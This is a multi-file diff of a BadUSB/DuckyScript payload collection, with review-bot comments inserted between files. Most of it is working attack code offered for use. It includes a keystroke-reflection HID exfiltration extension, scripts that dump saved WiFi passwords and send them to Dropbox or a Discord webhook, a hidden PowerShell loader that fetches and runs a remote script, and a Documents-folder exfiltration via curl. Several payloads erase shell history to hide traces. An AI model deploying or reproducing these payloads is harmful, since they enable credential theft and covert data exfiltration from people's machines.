DEFINE CHECK_INTERVAL 20 DEFINE #CHECK_INTERVAL 20
DEFINE WINDOWS_HOST_REQUEST_COUNT 2 DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
DEFINE NOT_WINDOWS 7 DEFINE #NOT_WINDOWS 7
VAR $MAX_TRIES = MAX_WAIT $_OS = #NOT_WINDOWS
VAR $MAX_TRIES = #MAX_WAIT
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0)) WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
DELAY CHECK_INTERVAL DELAY #CHECK_INTERVAL
$MAX_TRIES = ($MAX_TRIES - 1) $MAX_TRIES = ($MAX_TRIES - 1)
END_WHILE END_WHILE
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > WINDOWS_HOST_REQUEST_COUNT) THEN IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
$_OS = WINDOWS $_OS = WINDOWS
ELSE
$_OS = NOT_WINDOWS
END_IF END_IF
REM EXAMPLE USAGE AFTER EXTENSION REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
REM IF ($_OS == WINDOWS) THEN IF ($_OS == WINDOWS) THEN
REM STRING HELLO WINDOWS! STRING HELLO WINDOWS!
REM ELSE ELSE
REM STRING HELLO WORLD! STRING HELLO WORLD!
REM END_IF END_IF
END_REM
END_EXTENSION END_EXTENSION


@ -1,38 +1,62 @@
EXTENSION PROTECTED_STORAGE_MODE EXTENSION PROTECTED_STORAGE_MODE
REM VERSION 1.0 REM VERSION 1.1
REM AUTHOR: Korben
REM Example hidden storage mode REM_BLOCK
REM Forces user to padlock style unlock storage mode by setting Example hidden storage mode
REM the HOSTs lock keys and pressing the duck button to submit a Forces user to padlock style unlock storage mode by setting
REM combination three times. the HOSTs lock keys and pressing the duck button to submit a
REM The wrong combination will immediately fail silently. combination three times.
REM The correct combination will trigger ATTACKMODE STORAGE and LED_G The wrong combination will immediately fail silently.
The correct combination will trigger ATTACKMODE STORAGE and LED_G
REM TARGET: TARGET:
REM Any host that will reflect CAPSLOCK,NUMLOCK, and SCROLLLOCK Any host that will reflect CAPSLOCK,NUMLOCK, and SCROLLLOCK
REM USAGE: USAGE:
REM BUTTON_DEF BUTTON_DEF
REM STORAGE_PASSWORD_CHECK() STORAGE_PASSWORD_CHECK()
REM END_BUTTON END_BUTTON
CONFIGURATION:
Available combinations provided as DEFINEs below,
change within the STORAGE_PASSWORD_CHECK as desired
Method of input submission can be changed using SUBMIT_FOR_CHECK
But will obviously convolute combination checks.
END_REM
REM Combinations provided as defines for convenience (verbosely spaced - DEFINES aren't re-formatted by preprocessor)
DEFINE #ALL_LOCKS_OFF ( ( $_CAPSLOCK_ON == FALSE ) && ( $_NUMLOCK_ON == FALSE ) && ( $_SCROLLLOCK_ON == FALSE ) )
DEFINE #ALL_LOCKS_ON ( ( $_CAPSLOCK_ON == TRUE ) && ( $_NUMLOCK_ON == TRUE ) && ( $_SCROLLLOCK_ON == FALSE ) )
DEFINE #ONLY_CAPS_ON ( ( $_CAPSLOCK_ON == TRUE ) && ( $_NUMLOCK_ON == FALSE ) && ( $_SCROLLLOCK_ON == FALSE ) )
DEFINE #ONLY_NUM_ON ( ( $_CAPSLOCK_ON == FALSE ) && ( $_NUMLOCK_ON == TRUE ) && ( $_SCROLLLOCK_ON == FALSE ) )
DEFINE #ONLY_SCROLL_ON ( ( $_CAPSLOCK_ON == FALSE ) && ( $_NUMLOCK_ON == FALSE ) && ( $_SCROLLLOCK_ON == TRUE ) )
DEFINE #ONLY_CAPS_OFF ( ( $_CAPSLOCK_ON == FALSE ) && ( $_NUMLOCK_ON == TRUE ) && ( $_SCROLLLOCK_ON == TRUE ) )
DEFINE #ONLY_NUM_OFF ( ( $_CAPSLOCK_ON == TRUE ) && ( $_NUMLOCK_ON == FALSE ) && ( $_SCROLLLOCK_ON == TRUE ) )
DEFINE #ONLY_SCROLL_OFF ( ( $_CAPSLOCK_ON == TRUE ) && ( $_NUMLOCK_ON == TRUE ) && ( $_SCROLLLOCK_ON == FALSE ) )
DEFINE #SUBMIT_FOR_CHECK WAIT_FOR_BUTTON_PRESS
FUNCTION STORAGE_PASSWORD_CHECK() FUNCTION STORAGE_PASSWORD_CHECK()
VAR $ACCEPED = FALSE VAR $ACCEPED = FALSE
LED_R LED_R
WAIT_FOR_BUTTON_PRESS #SUBMIT_FOR_CHECK
REM first combination ALL LOCKS OFF REM first combination ALL LOCKS OFF
IF (($_CAPSLOCK_ON == FALSE) && ($_NUMLOCK_ON == FALSE) && ($_SCROLLLOCK_ON == FALSE)) THEN IF #ALL_LOCKS_OFF THEN
STRING . STRING .
WAIT_FOR_BUTTON_PRESS #SUBMIT_FOR_CHECK
REM second combination ONLY CAPS ON REM second combination ONLY CAPS ON
IF (($_CAPSLOCK_ON == TRUE) && ($_NUMLOCK_ON == FALSE) && ($_SCROLLLOCK_ON == FALSE)) THEN IF #ONLY_CAPS_ON THEN
STRING . STRING .
WAIT_FOR_BUTTON_PRESS #SUBMIT_FOR_CHECK
REM third combination ONLY NUM ON REM third combination ONLY NUM ON
IF (($_CAPSLOCK_ON == FALSE) && ($_NUMLOCK_ON == TRUE) && ($_SCROLLLOCK_ON == FALSE)) THEN IF #ONLY_NUM_ON THEN
$ACCEPTED = TRUE $ACCEPTED = TRUE
END_IF END_IF
END_IF END_IF
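Review bot: `DEFINE #ALL_LOCKS_ON` tests `( $_SCROLLLOCK_ON == FALSE )` as its third term, so it is not "all locks on" — it is the same condition as `#ONLY_SCROLL_OFF` two lines below, and any combination built on it would accept the wrong lock state; the third term should be `( $_SCROLLLOCK_ON == TRUE )`. Separately, the function declares `VAR $ACCEPED = FALSE` but the accepting branch assigns `$ACCEPTED = TRUE`, so the declared flag never changes and the assigned one is undeclared (carried over from the old version, but still on the new side); change the declaration to `VAR $ACCEPTED = FALSE`. STORAGE_PASSWORD_CHECK()'s body continues outside the hunk.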


@ -1,41 +1,52 @@
EXTENSION TRANSLATE EXTENSION TRANSLATE
REM VERSION 1.0 REM VERSION 1.1
REM AUTHOR: Korben
REM This extension acts as a library or collection of helper functions REM_BLOCK DOCUMENTATION
REM to work with converting variables in your payloads. This extension acts as a library or collection of helper functions
REM WHY: to work with converting variables in your payloads.
REM Of the many ways to get information about the state of your payload WHY:
REM is by injecting static strings effectively as debugging prints Of the many ways to get information about the state of your payload
REM However, given the non-static nature of payloads using variables in is by injecting static strings effectively as debugging prints
REM DuckyScript 3.0 - the ability to decode variables during payload However, given the non-static nature of payloads using variables in
REM execution and print (inject) representations of their current state DuckyScript 3.0 - the ability to decode variables during payload
REM can often be a critically helpful development and debugging tool. execution and print (inject) representations of their current state
can often be a critically helpful development and debugging tool.
REM Available Functions: Available Functions:
REM TRANSLATE_INT() - var to decimal string - set $INPUT prior to call DEFAULT:
REM TRANSLATE_HEX() - var to hexidecimal string - set $INPUT prior to call TRANSLATE_INT() - var to decimal string - set $INPUT prior to call
REM TRANSLATE_BINARY() - var to binary string - set $INPUT prior to call EXTENDED: (enabled using the #INCLUDE defines below):
REM TRANSLATE_BOOL() - var to boolean string - set $INPUT prior to call TRANSLATE_HEX() - var to hexidecimal string - set $INPUT prior to call
TRANSLATE_BINARY() - var to binary string - set $INPUT prior to call
TRANSLATE_BOOL() - var to boolean string - set $INPUT prior to call
REM USAGE: USAGE:
REM set $INPUT to desired var set $INPUT to desired var
REM call the correct translate_ function for the expected data type e.g. call the correct translate_ function for the expected data type e.g.
REM VAR $myVar = 1234 VAR $myVar = 1234
REM $INPUT = $myVar $INPUT = $myVar
REM TRANSLATE_INT() TRANSLATE_INT()
REM REM the above code will inject 1234 REM the above code will inject 1234
END_REM
REM begin extension variables REM CONFIGURATION:
DEFINE PRINT_INT 0 DEFINE #INCLUDE_TRANSLATE_HEX FALSE
DEFINE PRINT_HEX 1 DEFINE #INCLUDE_TRANSLATE_BOOL FALSE
VAR $DIGIT_PRINT_MODE = PRINT_INT DEFINE #INCLUDE_TRANSLATE_BINARY FALSE
DEFINE #INCLUDE_SWAP_ENDIAN FALSE
REM Append ENTER after translation
VAR $AS_STRINGLN = TRUE
DEFINE #PRINT_INT 0
DEFINE #PRINT_HEX 1
VAR $DIGIT_PRINT_MODE = #PRINT_INT
VAR $D = 0 VAR $D = 0
VAR $IN = 0 VAR $IN = 0
VAR $INPUT = 0 VAR $INPUT = 0
VAR $MOD = 0 VAR $MOD = 0
VAR $P = FALSE VAR $P = FALSE
VAR $NL = TRUE
REM end extension variables
REM REQUIRED for INT/HEX - convert int to char REM REQUIRED for INT/HEX - convert int to char
FUNCTION PRINTDIGIT() FUNCTION PRINTDIGIT()
@ -59,7 +70,8 @@ EXTENSION TRANSLATE
STRING 8 STRING 8
ELSE IF ($D == 9) THEN ELSE IF ($D == 9) THEN
STRING 9 STRING 9
ELSE IF ($DIGIT_PRINT_MODE == PRINT_HEX) THEN IF_DEFINED_TRUE #INCLUDE_TRANSLATE_HEX
ELSE IF ($DIGIT_PRINT_MODE == #PRINT_HEX) THEN
IF ($D == 10) THEN IF ($D == 10) THEN
STRING A STRING A
ELSE IF ($D == 11) THEN ELSE IF ($D == 11) THEN
@ -73,6 +85,7 @@ EXTENSION TRANSLATE
ELSE IF ($D == 15) THEN ELSE IF ($D == 15) THEN
STRING F STRING F
END_IF END_IF
END_IF_DEFINED
ELSE ELSE
STRING ? STRING ?
END_IF END_IF
@ -91,15 +104,18 @@ EXTENSION TRANSLATE
END_IF END_IF
END_FUNCTION END_FUNCTION
IF_DEFINED_TRUE #INCLUDE_SWAP_ENDIAN
REM ENDIAN SWAPPER helper, (useful for working with VID/PID) REM ENDIAN SWAPPER helper, (useful for working with VID/PID)
FUNCTION SWAP_ENDIAN() FUNCTION SWAP_ENDIAN()
$INPUT = ((($INPUT >> 8) & 0x00FF) | (($INPUT << 8) & 0xFF00)) $INPUT = ((($INPUT >> 8) & 0x00FF) | (($INPUT << 8) & 0xFF00))
END_FUNCTION END_FUNCTION
END_IF_DEFINED
REM Translates a variable of presumed integer type and attempts to convert REM Translates a variable of presumed integer type and attempts to convert
REM and inject a DECIMAL string representation REM and inject a DECIMAL string representation
FUNCTION TRANSLATE_INT() FUNCTION TRANSLATE_INT()
$DIGIT_PRINT_MODE = PRINT_INT $DIGIT_PRINT_MODE = #PRINT_INT
$P = FALSE $P = FALSE
IF ( $INPUT >= 10000) THEN IF ( $INPUT >= 10000) THEN
$MOD = 10000 $MOD = 10000
@ -119,28 +135,33 @@ EXTENSION TRANSLATE
END_IF() END_IF()
$D = $INPUT $D = $INPUT
PRINTDIGIT() PRINTDIGIT()
IF $NL THEN IF $AS_STRINGLN THEN
ENTER ENTER
END_IF END_IF
END_FUNCTION END_FUNCTION
REM Translates a variable of presumed boolean type and attempts to convert REM Translates a variable of presumed boolean type and attempts to convert
REM and inject a BOOLEAN string representation REM and inject a BOOLEAN string representation
REM TO ENABLE SET INCLUDE_TRANSLATE_BOOL to TRUE before compiling
IF_DEFINED_TRUE #INCLUDE_TRANSLATE_BOOL
FUNCTION TRANSLATE_BOOL() FUNCTION TRANSLATE_BOOL()
IF $INPUT THEN IF $INPUT THEN
STRING TRUE STRING TRUE
ELSE ELSE
STRING FALSE STRING FALSE
END_IF END_IF
IF $NL THEN IF $AS_STRINGLN THEN
ENTER ENTER
END_IF END_IF
END_FUNCTION END_FUNCTION
END_IF_DEFINED
REM Translates a variable of presumed integer type and attempts to convert REM Translates a variable of presumed integer type and attempts to convert
REM and inject a HEX string representation REM and inject a HEX string representation
REM TO ENABLE SET INCLUDE_TRANSLATE_HEX to TRUE before compiling
IF_DEFINED_TRUE #INCLUDE_TRANSLATE_HEX
FUNCTION TRANSLATE_HEX() FUNCTION TRANSLATE_HEX()
$DIGIT_PRINT_MODE = PRINT_HEX $DIGIT_PRINT_MODE = #PRINT_HEX
VAR $chars = 0 VAR $chars = 0
VAR $d1 = 0 VAR $d1 = 0
VAR $d2 = 0 VAR $d2 = 0
@ -192,13 +213,16 @@ EXTENSION TRANSLATE
$D = $d1 $D = $d1
PRINTDIGIT() PRINTDIGIT()
END_IF END_IF
IF $NL THEN IF $AS_STRINGLN THEN
ENTER ENTER
END_IF END_IF
END_FUNCTION END_FUNCTION
END_IF_DEFINED
REM Translates a variable of presumed integer type and attempts to convert REM Translates a variable of presumed integer type and attempts to convert
REM and inject a BINARY string representation REM and inject a BINARY string representation
REM TO ENABLE SET INCLUDE_TRANSLATE_BINARY to TRUE before compiling
IF_DEFINED_TRUE #INCLUDE_TRANSLATE_BINARY
FUNCTION TRANSLATE_BINARY() FUNCTION TRANSLATE_BINARY()
VAR $I = 16 VAR $I = 16
WHILE ( $I > 0 ) WHILE ( $I > 0 )
@ -210,8 +234,9 @@ EXTENSION TRANSLATE
END_IF END_IF
$INPUT = ($INPUT << 1) $INPUT = ($INPUT << 1)
END_WHILE END_WHILE
IF $NL THEN IF $AS_STRINGLN THEN
ENTER ENTER
END_IF END_IF
END_FUNCTION END_FUNCTION
END_IF_DEFINED
END_EXTENSION END_EXTENSION


@ -1,51 +1,91 @@
EXTENSION WINDOWS_HID_EXFIL EXTENSION WINDOWS_HID_EXFIL
REM VERSION 1.0 REM VERSION 1.1
REM AUTHOR: Korben
REM Helpers for Keystroke Reflection data exfiltration REM_BLOCK DOCUMENTATION
REM This payload is a proof of concept for USB HID only Data Exfiltration Helpers for Keystroke Reflection data exfiltration
This payload is a proof of concept for USB HID only Data Exfiltration
REM TARGET: TARGET:
REM Windows Hostthat supports powershell and SendKeys Windows Host that supports powershell and SendKeys
REM USAGE: USAGE:
REM Uncomment the function call below to run this extension inline Prepare data to exfil (in filename defined by TARGET_FILE below)
REM or call RUN_EXFIL() anywhere in your payload after the extension with a powershell window already open - call RUN_WINDOWS_EXFIL()
REM DEPLOYMENT: DEPLOYMENT:
REM Plug Ducky into host, wait for the LED to turn (and stay) solid Green. Plug Ducky into host, wait for the LED to turn (and stay) solid green.
END_REM
REM CONFIGURATION: REM CONFIGURATION:
REM File on host machine to exfil using Keystroke Reflection attack REM File on host machine to exfil
DEFINE TARGET_FILE filename.txt DEFINE #TARGET_FILE filename.txt
DEFINE #SAVE_AND_RESTORE_LOCKS TRUE
DEFINE #ENABLE_EXFIL_LEDS TRUE
DEFINE #CLOSE_AFTER_EXFIL TRUE
DEFINE #RUN_SIMPLE_USAGE_DEMO FALSE
FUNCTION RUN_WINDOWS_EXFIL() FUNCTION RUN_WINDOWS_EXFIL()
REM Boot IF_DEFINED_TRUE #SAVE_AND_RESTORE_LOCKS
LED_OFF
DELAY 500
REM Launch Windows RUN dialog
GUI r
DELAY 50
REM Launch powershell
STRING powershell
ENTER
DELAY 250
REM Save HOSTs current lock state
SAVE_HOST_KEYBOARD_LOCK_STATE SAVE_HOST_KEYBOARD_LOCK_STATE
REM Start Listening - Enable EXFIL mode, Enable EXFIL mode for Device LEDS END_IF_DEFINED
$_EXFIL_MODE_ENABLED = TRUE
IF_DEFINED_TRUE #ENABLE_EXFIL_LEDS
LED_OFF
$_EXFIL_LEDS_ENABLED = TRUE $_EXFIL_LEDS_ENABLED = TRUE
REM Convert and reflect target file END_IF_DEFINED
STRING foreach($b in $(Get-Content "TARGET_FILE" -Encoding byte)){foreach($a in 0x80,0x40,0x20,0x10,0x08,0x04,0x02,0x01){If($b -band $a){$o+="%{NUMLOCK}"}Else{$o+="%{CAPSLOCK}"}}};$o+="%{SCROLLLOCK}";Add-Type -Assembly System.Windows.Forms;[System.Windows.Forms.SendKeys]::SendWait("$o");exit;
$_EXFIL_MODE_ENABLED = TRUE
STRING_POWERSHELL
foreach($b in $(Get-Content "#TARGET_FILE" -Encoding byte)){
foreach($a in 0x80,0x40,0x20,0x10,0x08,0x04,0x02,0x01){
If($b -band $a){
$o+="%{NUMLOCK}"
}Else{
$o+="%{CAPSLOCK}"
}
}
};
$o+="%{SCROLLLOCK}";
Add-Type -Assembly System.Windows.Forms;
[System.Windows.Forms.SendKeys]::SendWait("$o");
exit;
END_STRING
IF_DEFINED_TRUE #CLOSE_AFTER_EXFIL
STRING exit;
END_IF_DEFINED
ENTER ENTER
REM Listen for EOF REM Listen for EOF
WAIT_FOR_SCROLL_CHANGE WAIT_FOR_SCROLL_CHANGE
REM Indicate SUCCESS on Device LED, Disable EXFIL mode
LED_G
$_EXFIL_MODE_ENABLED = FALSE $_EXFIL_MODE_ENABLED = FALSE
REM Restore HOSTs lock state to original
IF_DEFINED_TRUE #ENABLE_EXFIL_LEDS
LED_G
END_IF_DEFINED
IF_DEFINED_TRUE #SAVE_AND_RESTORE_LOCKS
RESTORE_HOST_KEYBOARD_LOCK_STATE RESTORE_HOST_KEYBOARD_LOCK_STATE
END_IF_DEFINED
END_FUNCTION END_FUNCTION
REM Uncomment the function call below to run this extension inline (here) IF_DEFINED_TRUE #RUN_SIMPLE_USAGE_DEMO
REM or call RUN_WINDOWS_EXFIL() anywhere in your payload after the extension REM DO NOT MODIFY THIS DEMO - copy and move outside extension if using as template.
REM RUN_WINDOWS_EXFIL() REM DEMO Boot Delay
DELAY 3000
REM Open run dialog
GUI r
DELAY 500
REM Open Powershell
STRINGLN powershell
DELAY 500
REM Prepare some data in TARGET_FILE
STRINGLN echo test123 > #TARGET_FILE
DELAY 500
REM Exfil data to USB Rubber Ducky using Keystroke Reflection
RUN_WINDOWS_EXFIL()
END_IF_DEFINED
END_EXTENSION END_EXTENSION
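Review bot: The four new switches `DEFINE #SAVE_AND_RESTORE_LOCKS TRUE`, `#ENABLE_EXFIL_LEDS`, `#CLOSE_AFTER_EXFIL` and `#RUN_SIMPLE_USAGE_DEMO` are added under `REM CONFIGURATION:` with no comment, while `#TARGET_FILE` keeps its one-line description. Each should get a REM line stating what it gates, which the body already shows: the first wraps the SAVE_/RESTORE_HOST_KEYBOARD_LOCK_STATE pair, the second wraps the LED_OFF/LED_G calls and `$_EXFIL_LEDS_ENABLED`, the third appends `STRING exit;`, and the fourth enables the demo block before END_EXTENSION. The `#CLOSE_AFTER_EXFIL` comment should also say what it adds over the `exit;` that already ends the STRING_POWERSHELL block, since as written the flag types a second `exit;`. The REM_BLOCK DOCUMENTATION lists USAGE and DEPLOYMENT but not these flags, so a one-line pointer there (`Options: see the DEFINE lines under CONFIGURATION`) would help a reader who only reads the header.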


@ -0,0 +1,29 @@
# Exfiltrate WiFi Passwords - Linux ✅
A script used to exfiltrate the wifi passwords on a Linux machine.
**Category**: Exfiltrate, Credentials, Execution
## Description
A script used to exfiltrate the wifi passwords on a Linux machine.
Opens a shell, get the WiFi names, get the passwords using nmcli, send the result to Dropbox, erase traces.
## Getting Started
### Dependencies
* Internet Connection
* Dropbox Token
* Permissions
### Executing program
* Plug in your device
### Settings
* Set the Dropbox token
* Set the sudo password


@ -0,0 +1,128 @@
REM #######################################################
REM # |
REM # Title : Exfiltrate Wifi Passwords - Linux |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Exfiltration, Credentials, Execution |
REM # Target : Linux |
REM # |
REM #######################################################
REM Requirements:
REM - Permissions
REM - Internet connection
REM - Dropbox Token
DELAY 1000
CTRL-ALT t
DELAY 2000
REM #### PREREQUISITES SECTION ####
REM Required: You need to know the sudo password and replace 'example' with this
DEFINE SUDO_PASS example
STRING sudo su
ENTER
DELAY 1000
STRING SUDO_PASS
ENTER
DELAY 2000
REM Required: Set here your Dropbox access TOKEN
DEFINE TOKEN example
STRING ACCESS_TOKEN="
STRING TOKEN
STRING "
ENTER
REM #### ZIP SECTION ####
DELAY 500
STRING RANDOM=$(shuf -i 1-999999999999 -n 1)
ENTER
DELAY 500
STRING ZIP_NAME="$RANDOM.zip"
ENTER
DELAY 500
STRING TMP_FOLDER_PATH=$(mktemp -d -p "/home" prefix-XXXXXXXXXX)
ENTER
DELAY 500
STRING ZIP_PATH="/home/$ZIP_NAME"
ENTER
REM #### WiFi && ZIP SECTION ####
REM Get all WiFi data
STRING for conn in $(nmcli connection show | grep wifi | awk '{print $1}'); do
ENTER
DELAY 500
STRING nmcli connection show $conn >> "$TMP_FOLDER_PATH/output_verbose.txt" -
ENTER
DELAY 500
STRING nmcli connection show $conn | grep psk >> "$TMP_FOLDER_PATH/output.txt" -
ENTER
DELAY 500
STRING done
ENTER
DELAY 500
REM Wifi exfiltration command time - It depends
DELAY 1000
STRING zip -r "$ZIP_PATH" "$TMP_FOLDER_PATH"
REM Zip operation time - It depends
DELAY 3000
REM #### EXFILTRATE SECTION ####
REM Set yout Dropbox folder name
DEFINE DROPBOX_FOLDER_NAME example
STRING DROPBOX_FOLDER="/
ENTER
STRING DROPBOX_FOLDER_NAME
ENTER
STRING "
ENTER
DELAY 500
DEFINE DROPBOX_API_CONST https://content.dropboxapi.com/2/files/upload
STRING curl -X POST
STRING DROPBOX_API_CONST
STRING --header "Authorization: Bearer $ACCESS_TOKEN" --header "Dropbox-API-Arg: {\"path\": \"$DROPBOX_FOLDER\",\"mode\": \"add\",\"autorename\": true,\"mute\": false}" --header "Content-Type: application/octet-stream" --data-binary "@$ZIP_PATH"
ENTER
REM #### REMOVE TRACES ####
DELAY 2000
STRING history -c
ENTER
DELAY 500
STRING rm -rf "$TMP_FOLDER_PATH"
ENTER
DELAY 500
STRING rm -rf "$ZIP_PATH"
ENTER
DELAY 500
STRING exit
ENTER
DELAY 500
STRING exit
ENTER


@ -0,0 +1,6 @@
#!/bin/bash
for conn in $(nmcli connection show | grep wifi | awk '{print $1}'); do
nmcli connection show $conn >> "$TMP_FOLDER_PATH/output_verbose.txt" -
nmcli connection show $conn | grep psk >> "$TMP_FOLDER_PATH/output.txt" -
done


@ -0,0 +1,26 @@
# WLAN Windows Password - BADUSB ✅
A script used to stole target WLAN Passwords.
**Category**: WLAN, Credentials
## Description
A script used to stole target WLAN Passwords.
Opens PowerShell hidden, grabs wlan passwords, saves as a cleartext in a variable and exfiltrates info via Discord Webhook.
Then it cleans up traces of what you have done after.
## Getting Started
### Dependencies
* An internet connection
* Windows 10,11
### Executing program
* Plug in your device
* Invoke 2 netsh commands
* Invoke-WebRequest will be entered in the Run Box to send the content


@ -0,0 +1,16 @@
# ENG
netsh wlan show profile | Select-String '(?<=All User Profile\s+:\s).+' | ForEach-Object {
$wlan = $_.Matches.Value
$passw = netsh wlan show profile $wlan key=clear | Select-String '(?<=Key Content\s+:\s).+'
$Body = @{
'username' = $env:username + " | " + [string]$wlan
'content' = [string]$passw
}
Invoke-RestMethod -ContentType 'Application/Json' -Uri $discord -Method Post -Body ($Body | ConvertTo-Json)
}
# Clear the PowerShell command history
Clear-History


@ -0,0 +1,25 @@
REM ###################################################################
REM # |
REM # Title : WLAN-Windows-Passwords-Discord-Exfiltration |
REM # Author : Aleff |
REM # Description: A script used to stole target WLAN Passwords. |
REM # Category : Credentials |
REM # Target : Windows 10-11 |
REM # Version : 1.0 |
REM # |
REM ###################################################################
DELAY 2000
GUI r
DELAY 250
STRING powershell -w h -ep bypass $discord='
REM REQUIRED - Provide Discord Webhook - https://discordapp.com/api/webhooks/<webhook_id>/<token>
DEFINE DISCORD example.com
STRING DISCORD
REM Reply example.com with YOUR LINK. The Payload should be Windows-Passwords.ps1
DEFINE PAYLOAD example.com
STRINGLN ';irm PAYLOAD | iex
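Review bot: The comment `REM Reply example.com with YOUR LINK. The Payload should be Windows-Passwords.ps1` reads "Reply" where "Replace" is meant; `REM Replace example.com with YOUR LINK. The Payload should be Windows-Passwords.ps1` is the intended wording. The same slip appears in the ProtonVPN payload added later in this commit, on its `REM Reply example.com with YOUR LINK. The Payload should be ProtonVPN-config.ps1` line. Both comments sit directly above `DEFINE PAYLOAD example.com`, so the wording is the only documentation of that placeholder and should be correct.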


@ -0,0 +1,28 @@
# Change MAC Address
A script used to change the MAC address on a Linux machine.
**Category**: Execution
## Description
A script used to change the MAC address on a Linux machine.
Opens a shell, get the network card name, set the new MAC address, erase traces.
## Getting Started
### Dependencies
* Linux Permissions
* Internet Connection
### Executing program
* Plug in your device
### Settings
* Set the sudo password
* Change as you want the new MAC address


@ -0,0 +1,73 @@
REM ###########################################
REM # |
REM # Title : Change Linux MAC Address |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Execution |
REM # Target : Linux |
REM # |
REM ###########################################
REM Requirements:
REM - Permissions
DELAY 1000
CTRL-ALT t
DELAY 2000
REM #### PERMISSIONS SECTION ####
REM You need to know the sudo password and replace 'example' with this
DEFINE SUDO_PASS example
STRING sudo su
ENTER
DELAY 1000
STRING SUDO_PASS
ENTER
DELAY 1000
REM #### MAC SECTION ####
REM net-tools command
STRING apt install net-tools
ENTER
DELAY 2000
REM Set here your preferred MAC, you can don't change it remaining with the default value
DEFINE NEW_MAC FF:FF:FF:FF:FF:FF
REM Get the net interface name
STRING INTERFACE=$(ip route get 8.8.8.8 | awk '{print $5}')
ENTER
DELAY 500
STRING ifconfig $INTERFACE down
ENTER
DELAY 500
STRING ifconfig $INTERFACE hw ether
STRING NEW_MAC
ENTER
DELAY 500
STRING ifconfig $INTERFACE up
ENTER
DELAY 500
REM #### REMOVE TRACES ####
DELAY 2000
STRING history -c
ENTER
REM Close shell
STRING exit
ENTER


@ -0,0 +1,27 @@
# Change Network Configuration
A script used to change the network configuration on a Linux machine.
**Category**: Execution
## Description
A script used to change the network configuration on a Linux machine.
Opens a shel, get the network card name, set the network configuration, erase traces.
## Getting Started
### Dependencies
* Linux Permissions
### Executing program
* Plug in your device
### Settings
* Set the sudo password
* Change as you want the network configuration


@ -0,0 +1,81 @@
REM ###############################################
REM # |
REM # Title : Change Network Configuration |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Execution |
REM # Target : Linux |
REM # |
REM ###############################################
REM Requirements:
REM - Permissions
DELAY 1000
CTRL-ALT t
DELAY 2000
REM #### PERMISSIONS SECTION ####
REM Required: You need to know the sudo password and replace 'example' with this
DEFINE SUDO_PASS example
STRING sudo su
ENTER
DELAY 1000
STRING SUDO_PASS
ENTER
DELAY 1000
REM #### IP SECTION ####
REM net-tools command
STRING apt install net-tools
ENTER
DELAY 2000
REM Set network interface
DEFINE IP 192.168.1.100
DEFINE MASK 255.255.255.0
DEFINE GATEWAY 192.168.1.1
STRING IP="
STRING IP
STRING "
ENTER
DELAY 500
STRING MASK="
STRING MASK
STRING "
ENTER
DELAY 500
STRING GATEWAY="
STRING GATEWAY
STRING "
ENTER
DELAY 500
REM Get the net interface name
STRING INTERFACE=$(ip route get 8.8.8.8 | awk '{print $5}')
ENTER
DELAY 500
STRING ifconfig $INTERFACE $IP netmask $MASK up
ENTER
DELAY 500
REM #### REMOVE TRACES ####
STRING history -c
ENTER
DELAY 500
REM Close shell
STRING exit
ENTER


@ -0,0 +1,32 @@
# Exfiltrate Linux Content With Dropbox - BADUSB ✅
A script used to take folder content on Linux Systems.
**Category**: Exfiltration, Execution
[![Hits](https://hits.seeyoufarm.com/api/count/incr/badge.svg?url=https%3A%2F%2Fgithub.com%2Faleff-github%2Fmy-flipper-shits&count_bg=%233C3C3C&title_bg=%233C3C3C&icon=linux.svg&icon_color=%23FFFFFF&title=views&edge_flat=false)](https://github.com/aleff-github/my-flipper-shits)
## Description
A script used to take folder content on Linux Systems.
Opens a shel, zip all zippable (R permission) content of the folder, send the zip into the dropbox folder, delete shell history.
## Getting Started
### Dependencies
* Internet Connection
* Linux System
* * Terminal that can be opened by the shortcommand CTRL-ALT t
* DropBox Account for the access token
### Executing program
* Plug in your device
### Settings
* Set your dropbox access token
* Set the folder path interessed (i.e. /Documents)
* Change (if you think that it is necessary) the delay of the zipping operation


@ -0,0 +1,82 @@
REM ##########################################################
REM # |
REM # Title : Exfiltrate Linux Content With Dropbox |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Exfiltration, Execution |
REM # Target : Linux |
REM # |
REM ##########################################################
REM Requirements:
REM - Internet Connection
REM - Dropbox Account
REM - - DROPBOX_ACCESS_TOKEN
DELAY 1000
CTRL-ALT t
DELAY 2000
REM Required: Set here your Dropbox access TOKEN
DEFINE TOKEN example
STRING ACCESS_TOKEN="
STRING TOKEN
STRING "
ENTER
DELAY 500
STRING USER_NAME=$(whoami)
ENTER
DELAY 500
STRING path="/home/$USER_NAME/Documents"
ENTER
DELAY 500
STRING RANDOM=$(shuf -i 1-999999999999 -n 1)
ENTER
DELAY 500
STRING NAME="$RANDOM.zip"
ENTER
DELAY 500
STRING ZIP_PATH="$path/$NAME"
ENTER
DELAY 500
REM The FOLDER that you want to zip, in this example you want to zip all Documents content
STRING FOLDER="/home/$USER_NAME/Documents/"
ENTER
REM Delay for zipping operation, it depends by computer power and folder directory
DELAY 10000
DELAY 500
STRING if [ -r "$FOLDER" ]; then
ENTER
STRING zip -r "$ZIP_PATH" "$FOLDER" > /dev/null 2>&1
ENTER
STRING else
ENTER
STRING echo ""
ENTER
STRING fi
ENTER
DELAY 500
STRING DROPBOX_FOLDER="/$NAME"
ENTER
DELAY 500
DEFINE DROPBOX_API_CONST https://content.dropboxapi.com/2/files/upload
STRING curl -X POST
STRING DROPBOX_API_CONST
STRING --header "Authorization: Bearer $ACCESS_TOKEN" --header "Dropbox-API-Arg: {\"path\": \"$DROPBOX_FOLDER\",\"mode\": \"add\",\"autorename\": true,\"mute\": false}" --header "Content-Type: application/octet-stream" --data-binary "@$ZIP_PATH"
ENTER
DELAY 2000
STRING history -c
ENTER


@ -0,0 +1,33 @@
# Exfiltrate Linux Log Files - BADUSB ✅
A script used to take linux logs.
**Category**: Exfiltration, Execution
